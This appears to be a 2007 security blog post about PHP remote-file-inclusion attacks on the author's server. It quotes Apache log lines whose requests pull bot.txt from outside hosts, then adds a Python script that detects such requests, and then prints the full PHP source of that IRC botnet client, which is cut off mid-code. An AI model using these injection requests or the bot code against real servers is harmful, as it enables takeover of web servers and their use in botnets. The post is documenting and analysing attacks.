Nov
Crazy php code injections
Posted by jerry as Hacking, Security
As I’ve written about here several times, the onslaught of unsuccessful PHP include attacks continues. Today, I saw a new file referenced – bot.txt. It looked like this in the Apache log file:
216.246.48.124 - - [23/Nov/2007:17:17:13 -0500] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1" 404 41845 "-" "libwww-perl/5.808"
216.246.48.124 - - [23/Nov/2007:17:17:13 -0500] "GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1" 404 41894 "-" "libwww-perl/5.808"
216.246.48.124 - - [23/Nov/2007:17:17:14 -0500] "GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1" 404 41857 "-" "libwww-perl/5.808"
205.234.253.31 - - [23/Nov/2007:17:18:40 -0500] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1" 404 41845 "-" "libwww-perl/5.808"
205.234.253.31 - - [23/Nov/2007:17:18:40 -0500] "GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1" 404 41894 "-" "libwww-perl/5.808"
205.234.253.31 - - [23/Nov/2007:17:18:41 -0500] "GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1" 404 41857 "-" "libwww-perl/5.808"
72.29.84.167 - - [23/Nov/2007:17:18:57 -0500] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1" 404 41845 "-" "libwww-perl/5.808"
72.29.84.167 - - [23/Nov/2007:17:18:57 -0500] "GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1" 404 41894 "-" "libwww-perl/5.808"
72.29.84.167 - - [23/Nov/2007:17:18:57 -0500] "GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1" 404 41857 "-" "libwww-perl/5.808"
69.65.20.238 - - [23/Nov/2007:17:19:18 -0500] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1" 404 41832 "-" "libwww-perl/5.808"
69.65.20.238 - - [23/Nov/2007:17:19:18 -0500] "GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1" 404 41881 "-" "libwww-perl/5.808"
69.65.20.238 - - [23/Nov/2007:17:19:19 -0500] "GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1" 404 41844 "-" "libwww-perl/5.808"
205.134.252.23 - - [23/Nov/2007:17:21:05 -0500] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1" 404 41832 "-" "libwww-perl/5.808"
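Requests like the ones above can be pulled out of an access log mechanically. The following is an added example, not part of the original post: it parses combined-format lines, flags any query parameter whose value is a URL, and groups the hits by payload location. The sample lines are constructed (documentation IP ranges, .example hosts, and a hypothetical /old/view.php script), modelled on the entries above.

```python
import re
from collections import namedtuple
from urllib.parse import parse_qsl, unquote

# Apache "combined" format:
#   host ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)

# Parameter values beginning with a scheme that PHP stream wrappers can open.
# Legitimate redirect/return-URL parameters also match; allowlist those by name.
REMOTE_VALUE = re.compile(r'^(?:https?|ftps?|php|data|expect):', re.I)

# Blog and e-mail software rewrites ASCII quotes and dashes; undo that first.
TYPOGRAPHIC = str.maketrans({'\u201c': '"', '\u201d': '"', '\u2033': '"', '\u2013': '-'})

Hit = namedtuple('Hit', 'ip ts param payload status agent')

# Constructed sample input (not real traffic).
SAMPLE_LOG = '''\
203.0.113.10 - - [23/Nov/2007:17:17:13 -0500] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://payload.example/lib/bot.txt?? HTTP/1.1" 404 41845 "-" "libwww-perl/5.808"
203.0.113.10 - - [23/Nov/2007:17:17:14 -0500] "GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://payload.example/lib/bot.txt?? HTTP/1.1" 404 41857 "-" "libwww-perl/5.808"
198.51.100.7 - - [23/Nov/2007:17:19:18 -0500] "GET //chat/inc/cmses/aedating4CMS.php?dir%5Binc%5D=http%3A%2F%2Fpayload.example%2Flib%2Fbot.txt?? HTTP/1.1" 404 41832 "-" "libwww-perl/5.808"
198.51.100.7 - - [23/Nov/2007:17:19:30 -0500] "GET /old/view.php?page=ftp://other.example/x.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.808"
192.0.2.44 - - [23/Nov/2007:17:20:01 -0500] "GET /2007/11/20/current-crop-of-php-include-attempts/ HTTP/1.1" 200 18211 "-" "Mozilla/5.0"
192.0.2.45 - - [23/Nov/2007:17:20:09 -0500] "GET /index.php?s=http+headers HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
'''


def find_rfi_attempts(lines):
    """Return one Hit per query parameter whose decoded value is a remote URL."""
    hits = []
    for raw in lines:
        m = LOG_RE.match(raw.translate(TYPOGRAPHIC).strip())
        if not m:
            continue
        # Split by hand: a target starting with "//" would be misread as a
        # network location by urllib.parse.urlsplit().
        _, _, query = m['target'].partition('?')
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # second pass catches double encoding
            if REMOTE_VALUE.match(value):
                # Trailing "?" is stripped so identical payloads group together.
                hits.append(Hit(m['ip'], m['ts'], name, value.rstrip('?'),
                                int(m['status']), m['agent']))
    return hits


def summarize(hits):
    """Group hits by payload URL: who asked for it, how often, and whether
    any request got a non-error status (the targeted script exists here)."""
    out = {}
    for h in hits:
        entry = out.setdefault(h.payload, {'sources': set(), 'requests': 0, 'served': 0})
        entry['sources'].add(h.ip)
        entry['requests'] += 1
        if h.status < 400:
            entry['served'] += 1
    for entry in out.values():
        entry['sources'] = sorted(entry['sources'])
    return out


if __name__ == '__main__':
    for payload, info in summarize(find_rfi_attempts(SAMPLE_LOG.splitlines())).items():
        flag = 'CHECK THIS SCRIPT' if info['served'] else 'all rejected'
        print(f"{payload}: {info['requests']} requests from {info['sources']} ({flag})")
```

A non-zero "served" count is the entry to look at first: every request in the post returned 404, so a 200 on the same pattern means the requested script exists on the server.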
I have been downloading and looking at each of the files I see – most of them are the same or loosely copied from one another. Today is the first time I have seen this file. The file follows:
</html>
<title>31337</title>
<?php
//fighter script – BAJAY
function working() {
$querym=array(
“?”,
“!”,
“^^”,
” ^^”,
”
“,
”
”,
” ~:>”,
”
~”,
”
”,
“,”,
“.”,
“a”,
“i”,
“u”,
“e”,
“o”,
“z”,
“v”,
“z”,
“x”,
“c”,
“p”,
“m”,
“t”,
“k”,
“b”,
“s”,
“u”,
“bot”,
“g”,
“lo”,
“jo”,
“lol”
);
$tsu1=array(“`”,”|”,”[","]“,”{“,”}”,”^”,”“);
$tsu2=array(“`”,”|”,”[","]“,”{“,”}”,”^”,”-”,”\\”,”“);
$nicky=array(
”indotong”,
”rujange”,
”kentungs`”,
”sa_bosox”,
”japut1h”,
”start-Tegal”,
”stafp-pol”,
”apring”,
”my-bojo”,
”didiamu”,
”acongkasep”,
”rahasiailahi”,
”kutukurap”,
”duniagame”,
”pipilak”,
”Deeams”,
”Dewiani”,
”Lohanes”,
”Semsem2″,
”kuruyuk”,
”J4mput9″,
”acongTop”,
”bojokuayu”,
”Yuliyanti”,
”Ratnazar1″,
”Mydidit”,
”Rebecha”,
”Rastang”,
”Ganjils”,
”Bob-ho”,
”Dhinihari”,
”Dewimalam”,
”Lunaks”,
”Lowo-lawet”,
”Kolor-ku”,
”repolisi”,
”macanireng”,
”ivantat”,
”Kasugihan”,
”Kasiandeh”,
”awakapal”,
”Rachings”,
”War-tol”,
”Warnetlu”,
”Antikus”,
”[Dwirais]“,
”Phoecrot”,
”hiumania”,
”mas-amain”,
”Fafa-item”,
”Neonoek”,
”mba-abel”,
”Bencana”,
”nyosor”,
”Fitaken”,
”novakerep”,
”poerin”,
”lembene”,
”[sutijah]“,
”Skickmat”,
”Depangank”,
”Bonutang”,
”Stelangas”,
”Hellomam”,
”Pinkwingke”,
”Rolsepatu”,
”Defanku”,
”Mamalia”,
”Grahams”,
”Rocok”,
”jintuL-”,
”Urunan”,
”Piceks”,
”Kirbaju”,
”Asinans”,
”Muluk”,
”Mainanku”,
”Memete”,
”Kerambol”,
”Morbaut”,
”Clanane”,
”Nicitirta”,
”Jahlogo”,
”Sogokeh”,
”Hayamwuruk”,
”Selipan”,
”Myculun”,
”Mybojoe”,
”Selething”,
”T|kets”,
”Kompromi”,
”Montoks”,
”Trinitad”,
”Turboxs”,
”Mymata”,
”Indomobil”,
”KotaTegalkoe”,
”Peramal”,
”Hilangkoe”,
”Jalangs”,
”Jeengkel”,
”KaKikuda”,
”zhempol”,
”Pupens”,
”reneo”,
”[dorce]“,
”[yakin]“,
”[sung]“,
”[asli]“,
”suratan”,
”Cemplunk”,
”ladood”,
”lodados”,
”Jaambret”,
”Nyanyie”,
”Karmate”,
”Kunclup”,
”Simiskin”,
”Kamprets”,
”Kandang”,
”Kamuse”,
”Kendils”,
”Ketans”,
”Maantri”,
”anjengk”,
”angklung”,
”Kopok”,
”Krasi”,
”Kotors”,
”Karpets”,
”Kejangs”,
”Antraxs”,
”Adaband”,
”Kakusung”,
”Cocoran”,
”Bebelak”,
”Buluss”,
”Banatung”,
”Bembem”,
”Buntung”,
”Boroks”,
”Bambangs”,
”Bonteng”,
”Bumbu”,
”Bagasi”,
”Bimbing”,
”Chawets”,
”Coontex”,
”Clikat”,
”Cemceman”,
”Cokore”,
”Cuning”,
”Karmans”,
”Kodils”,
”Kaamra”,
”Darjo”,
”Dawud”,
”Daarto”,
”Damrie”,
”Dakroni”,
”Dimyati”,
”Dulung”,
”Enteng”,
”Emaxs”,
”Lomoboh”,
”Comodore”,
”Cimenks”,
”Cerutu”,
”Contonge”,
”Cukek”,
”Comblang”,
”Cemplak”,
”Cemanie”,
”Cembok”,
”Cekram”,
”Tegasung”,
”Tegarlah”,
”Teguhlah”,
”Tegeltak”,
”Tempek”,
”Antraxs”,
”Ampow”,
”Azdan”,
”Aburadul”,
”Antro”,
”Amings”,
”Angrexs”,
”Asrama”,
”Alimsung”,
”Aalas”,
”Abangku”,
”Amise”,
”Aconks”,
”Acongcup”,
”Acongsu”,
”Aconger”,
”Acongus”,
”Acongen”,
”sshd”,
”Masterkid”,
”alexutz”,
”andreea”,
”diana”,
”marius”,
”r00t”,
”kit”,
”mihai”,
”mihaela”,
”mario”,
”daiana”,
”andrei”,
”andreia”,
”tigan”,
”petre”,
”peter”,
”alexandre”,
”raluca”,
”master”,
”kid”,
”alias”,
”sbin”,
”p0rt”,
”sync”,
”mildest”,
”xzvf”,
”tar”,
”tgz”,
”dfg”,
”netcatxpl”,
”xpl”,
”xop”,
”xpls”,
”xploit”,
”xploits”,
”drxrwx”,
”drx-x”,
”system32″,
”alexandru”,
”alexander”,
”mihaela”,
”andrusca”,
”andra”,
”darius”,
”dani”,
”darnie”,
”daniel”,
”daniela”,
”mist3r”,
”x9v93c”,
”hunglec”,
”blasje”,
”bash”,
”blicke”,
”foirne”,
”wonder”,
”cvv2″,
”ssn”,
”creditcard”,
”ccnumber”,
”usher”,
”salam”,
”guta”,
”gutza”,
”biatchx”,
”bitch”,
”bitchX”,
”cine3″,
”scufitza”,
”copiluldeaur”,
”b0r4k”,
”counter”,
”strike”,
”usuf”,
”erny”,
”ernest”,
”modjo”,
”jinger”,
”b0ts”,
”r00ter”,
”g00gler”,
”mistcke”,
”linuxhack”,
”linuxhacker”,
”hacked”,
”fain”,
”ssl”,
”czxvr”,
”alb”,
”rosu”,
”romania”,
”rusia”,
”uk”,
”anglia”,
”comment”,
”hi5″,
”yah00″,
”silence”,
”us-com”,
”htiermc”,
”c00ldown”,
”misteryo”,
”hasked”,
”billaio”,
”smeoua”,
”muie”,
”sugator”,
”hashed”,
”f0lds”,
”folk”,
”f0lks”,
”numeroben”,
”hulk”,
”hiscke”,
”unae”,
”unhackable”,
”unhacker”,
”h4ack3rz”,
”hackerz”,
”ruter”,
”inji”,
”injecto”,
”freespace”,
”bulling”,
”mihaio”,
”ulgia”,
”c992mc”,
”miskce”,
”uber”,
”n0r”,
”c0x”,
”niekad”,
”naked”,
”nakedboy”,
”b0ys”,
”b0y”,
”messenger”,
”hopa”,
”hai-hui”,
”power-me”,
”sekos”,
”micke”,
”n0tron”,
”ron”,
”d0llars”,
”Euros”,
”pavalgia”,
”nasty”,
”hideend”,
”miskr3c”,
”incjen”,
”mass”,
”mailers”,
”mail3r”,
”th3kid”,
”k1d”,
”hepa”,
”m00r-d3f”,
”tzaca-paca”,
”headshot”,
”higgings”,
”slapest”,
”gansta”,
”gigging”,
”oame”,
”aoana”,
”mcike_dke”,
”blible”,
”XeqtR”,
”Xander”,
”xXx”,
”xxL”,
”vartmp”,
”0aoek”,
”summer”,
”etez”,
”crucike”,
”n0rme”,
”mihale”,
”c0rneaz”,
”blestem”,
”ghoost”,
”sicles”,
”c0mrsze”,
”sckme”,
”abie9t”,
”g912mc”,
”opernms”,
”micake”,
”qsuen”,
”zquers”,
”targetzd”,
”kem30ce”,
”nik1rc”,
”miosugi”,
”sugipula”,
”alupigus”,
”criminal”,
”danke”,
”shonw”,
”c0mrme”,
”muhahah”,
”biker4zs”,
”ckkemc”,
”clujeane”,
”hepahofn”,
”hepafon”,
”blackspace”,
”aabbcc”,
”ni1krc”,
”perosume”,
”perugis”,
”cliskeacz”,
”hennmx0c”,
”gbusf41″,
”bv9mvu3″,
”nik3rcs”,
”ghruwec”,
”slickez”,
”burgez”,
”h4mburger”,
”dijenmcie”,
”pijakence”,
”hai-blaeh”,
”power-you”,
”djstone”,
”djkid”,
”djthekid”,
”djmaster”,
”eftimie”,
”djcorason”,
”djalex”,
”djconstantin”,
”djbitch”,
”djk1d”,
”djtarget”,
”masterjungel”,
”daradaam”,
”uhmenze”,
”glicjex”,
”fortex”,
”hepafoneav”,
”m00rd3r”,
”tzacapaca”,
”nijeaz”,
”clijekcmez”,
”okkmmenc”,
”psyBNCz”,
”shellZ0″,
”kinderuL”,
”XeqtR”,
”metrolink”,
”ana”,
”anna”,
”squre”,
”xzvf0″,
”k1d-”,
”norman”,
”zquRs”,
”howhigh”,
”howhigt2″,
”blessus”,
”am3rica”,
”amer1ca”,
”spion”,
”spypower”,
”nextfan”,
”upl0ad”,
”s3arch”,
”searchX”,
”b0rak”,
”w00ps”,
”s0x”,
”nefertiti”,
”woops”,
”higlas”,
”cronx”,
”sown”,
”zappura”,
”heavenX”,
”muhahah1″,
”biker4zs1″,
”ckkemc1″,
”clujeane1″,
”hepahofn1″,
”hepafon1″,
”blackspace1″,
”aabbcc1″,
”ni1krc1″,
”perosume1″,
”perugis1″,
”cliskeacz1″,
”hennmx0c1″,
”gbusf411″,
”bv9mvu31″,
”nik3rcs1″,
”ghruwec1″,
”slickez1″,
”burgez1″,
”h4mburger1″,
”dijenmcie1″,
”pijakence1″,
”hai-blaeh1″,
”power-you1″,
”djstone1″,
”djkid1″,
”djthekid1″,
”djmaster1″,
”eftimie1″,
”djcorason1″,
”djalex1″,
”djconstantin1″,
”djbitch1″,
”djk1d1″,
”djtarget1″,
”masterjungel1″,
”daradaam1″,
”uhmenze1″,
”glicjex1″,
”fortex1″,
”hepafoneav1″,
”m00rd3r1″,
”tzacapaca1″,
”nijeaz1″,
”clijekcmez1″,
”okkmmenc1″,
”psyBNCz1″,
”shellZX”,
);
$usr1=array(
“zider”,
);
$nick = $nicky[rand(0,count($nicky) - 1)];
$awaymsg = “_4ÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚»_8!_4ÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚« 4H4Kim _8CÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚®ÃfĮâ€TMÃf†â€™Ãfƒâ€šÃf‚«wS _4ÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚»_8!_4ÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚«__”;
$identify = ”;
$Admin = ‘zaNga’;
$BOT_PASSWORD = ’123′;
$channels = ‘netcat’;$remotehst2= array(“irc.yogyakarta.cn”);
$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)];
$port = ’6667′;$raway = “on”;
$realname = $nick;
$counterfp = 0;
$channels = str_replace(“CNL”,”",$channels);
print “<body bgcolor=#000000 text=#C0C0C0>”;
print “<b>== Connecting to $remotehost…</b>”;
$log = “off”;
$saway = “1″;
if (!$stime) { $stime = time(); }
if (!$port) { $port = “6666″; }
$Admin = strtolower($Admin);
$auth = array($Admin => array(“name” => $Admin, “pass” => $BOT_PASSWORD, “auth” => 1,”status” => “Admin”));
$username = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$keluar = 0;
$akill = 1;
$katime = 0;
$localhost = ‘localhost’;
$dayload = date(“H:i:s d/m/Y”);
ini_set(‘user_agent’,'MSIE 5\.5;’);
set_time_limit(0);
define (‘CRL’, “\r\n”);
$channels = strtolower($channels).” “;
$channel = explode(” “, $channels);
do {
$fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30);
if(!$fp) {
if ( $counterfp <= 200 ) {
$counterfp = $counterfp+1;
working($nick);
}
else {
print "<br><b>Cannot connect to $remotehost!<br>Please Try Another Server!</b>";
$keluar = 1;
exit;
}
}
print “<br><b>== Suceeded connection</b>”;
$Header = ‘NICK ‘.$nick . CRL;
$Header .= ‘USER ‘.$username.’ ‘.$localhost.’ ‘.$remotehost.’ :’.$realname . CRL;
fputs($fp, $Header);
$response = ”;
while (!feof($fp)) {
$response .= fgets($fp, 1024);
while (substr_count($response,CRL) != 0) {
$offset = strpos($response, CRL);
$data = substr($response,0,$offset);
$response = substr($response,$offset+2);
if (substr($data,0,1) == ':') {
$offsetA = strpos($data, ' ');
$dFrom = substr($data,1,$offsetA-1);
$offsetB = strpos($data, ' :');
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
$offsetC = strpos($data, '!');
$dNick = substr($data,1,$offsetC-1);
$iText = substr($data,$offsetB+2);
if ( substr($dCommand,0,3) == '004' ) {
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }
fputs($fp, 'NOTICE ' . $Admin . ' :Halo bos besar!' . CRL);
foreach ($channel as $v) {
fputs($fp, 'JOIN ' .$v . CRL);
}
$pong1 = '1';
}
elseif (substr($dCommand,0,3)=='465') {
print "<br><b>== This bot have been autokilled.</b>";
$akill = 2;
}
elseif (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
elseif (substr($dCommand,0,3)=='432') {
$nick = $nick.$username;
fputs($fp, 'NICK '.$nick . CRL);
}
if (eregi('.dal.net',$dNick) && $akill==2) {
if (eregi('AKILL ID:',$data) || eregi('Your hostmask is',$data) || eregi('Your IP is',$data)) {
print "<br><b>".strstr($data,'***')." </b>";
if (eregi('Your IP is',$data)) {
$keluar = 1;
exit;
}
}
}
$dcom = explode(" ", $dCommand);
$dNick = strtolower($dNick);
if ($dcom[0]=='KICK' && $dcom[2]==$nick) {
fputs($fp, 'JOIN ' .$dcom[1]. CRL);
}
elseif ($dcom[0]=='NICK' || $dcom[0]=='QUIT' || $dcom[0]=='PART') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($dcom[0]=='NICK') {
$com = explode(" ", $data);
$chnick = strtolower(str_replace(':','',$com[2]));
if ($dNick!=$chnick) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE '.$chnick.' :selamat istirahat bos! ' . CRL);
}
} else { $auth["$dNick"]["auth"] = 1; fputs($fp,'NOTICE '.$dNick.' :selamat istirahat bos! ' . CRL); }
}
} else { fputs($fp,'NOTICE ' . $dNick . ' :pass your pass ' . CRL); }
}
}
elseif ($dcom[0]=='307' && strtolower($dcom[2])==$whois) {
$dcom[2] = strtolower($dcom[2]);
if ($auth["$dcom[2]"]) {
if ($auth["$dcom[2]"]["pass"]) {
if ($auth["$dcom[2]"]["auth"]==1) {
$auth["$dcom[2]"]["auth"] = 2; $whois = "";
fputs($fp,'NOTICE ' . $dcom[2] . ' :kamu masukan password as '.$auth["$dcom[2]"]["status"].' of this bot! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :password oke bos aChOnGs seep emuach di titid! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . '
ass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($dcom[0]=='NOTICE') {
$com = explode(" ", $data);
if ($com[3]==':KB' && $com[4] && $com[5] && $com[6]) {
$msg = strreplace('','',$data);
$msg = strstr($msg,":KB");
$msg = strreplace(":KB $com[4]","",$msg);
fputs($fp, 'KICK '.$com[4].' '.$com[5].' :'.$msg . CRL);
fputs($fp, 'MODE '.$com[4].' +b *!*'.$com[6] . CRL);
}
}
elseif ($dcom[0]=='PRIVMSG') {
$com = explode(" ", $data);
if ($com[3]==':VERSION') {
fputs($fp,'NOTICE '.$dNick.' :'.chr(1).'VERSION mIRC v6.16 Khaled Mardam-Bey'.chr(1) . CRL);
}
elseif ($auth["$dNick"]["status"] && $com[3]==':auth' && $com[4]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==1) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["auth"] = 2;
fputs($fp,'NOTICE ' . $dNick . ' :kamu masukkan password as '.$auth["$dNick"]["status"].' of this bot! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :passworde salah syu! Auth salah Shu! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :password bener bos aChOnGs emang oke! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . '
ass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':deauth') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :You`re LogOut! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :You`re Already LogOut! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . '
ass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':pass' && $com[4]) {
if ($auth["$dNick"]) {
if (!$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[4];
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :Your Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . '
ass Already Set! Type: auth <your pass> To Get Authorized ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':chgpass' && $com[4] && $com[5]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :Your New Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Your Old Pass Wrong! Type: chgpass <old pass> <new pass> To Change Your Auth Pass ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . '
lease Auth First! Type: auth <your pass> To Authorized ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':adduser' && $com[4] && $com[4]!=$nick && $com[5]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($com[5]=="master" || $com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass> To Set Your Pass ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :salah Command! Type: adduser <nick> <master/user> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if (!$auth["$com[4]"]) {
if ($com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass33] <Spyderur Pass ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: adduser <nick> user ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :User Already Exist! Aborting AddUser! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . '
lease Auth First! Type: auth <your pass> To Authorized ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':deluser' && $com[4]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($auth["$com[4]"]["status"]=="master" || $auth["$com[4]"]["status"]=="user") {
unset($auth["$com[4]"]);
fputs($fp,'NOTICE ' . $dNick . '
elUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if ($auth["$com[4]"]["status"]=="user") {
unset($auth["$com[4]"]);
fputs($fp,'NOTICE ' . $dNick . '
elUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . '
lease Auth First! Type: auth <your pass> To Authorized ' . CRL); }
}
elseif ($auth["$dNick"]["status"]) {
if (ereg(":`",$com[3]) || ereg(":!",$com[3])) {
$chan = strstr($dCommand,"#");
$anick = str_replace("PRIVMSG ","",$dCommand);
if ($com[3]==':!auth') {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'NOTICE '.$dNick.' :Jembutz..! You`re already Authorized!' . CRL);
} else {
$whois = $dNick;
fputs($fp,'WHOIS '.$dNick . CRL);
}
} elseif ($com[3]==':`auth' && $chan) {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Hamba siap mencari janda Bos!' . CRL);
} else { fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Raimu bukan bosku cok!' . CRL); }
} elseif ($auth["$dNick"]["auth"]==2) {
if ($com[3]==':`say' && $com[4] && $chan) {
$msg = strstr($data,":`say");
$msg = str_replace(":`say ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :'.$msg. CRL);
}
elseif ($com[3]==':`act' && $com[4] && $chan) {
$msg = strstr($data,":`act");
$msg = str_replace(":`act ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :ACTION '.$msg.''. CRL);
}
elseif ($com[3]==':`slap' && $com[4] && $chan) {
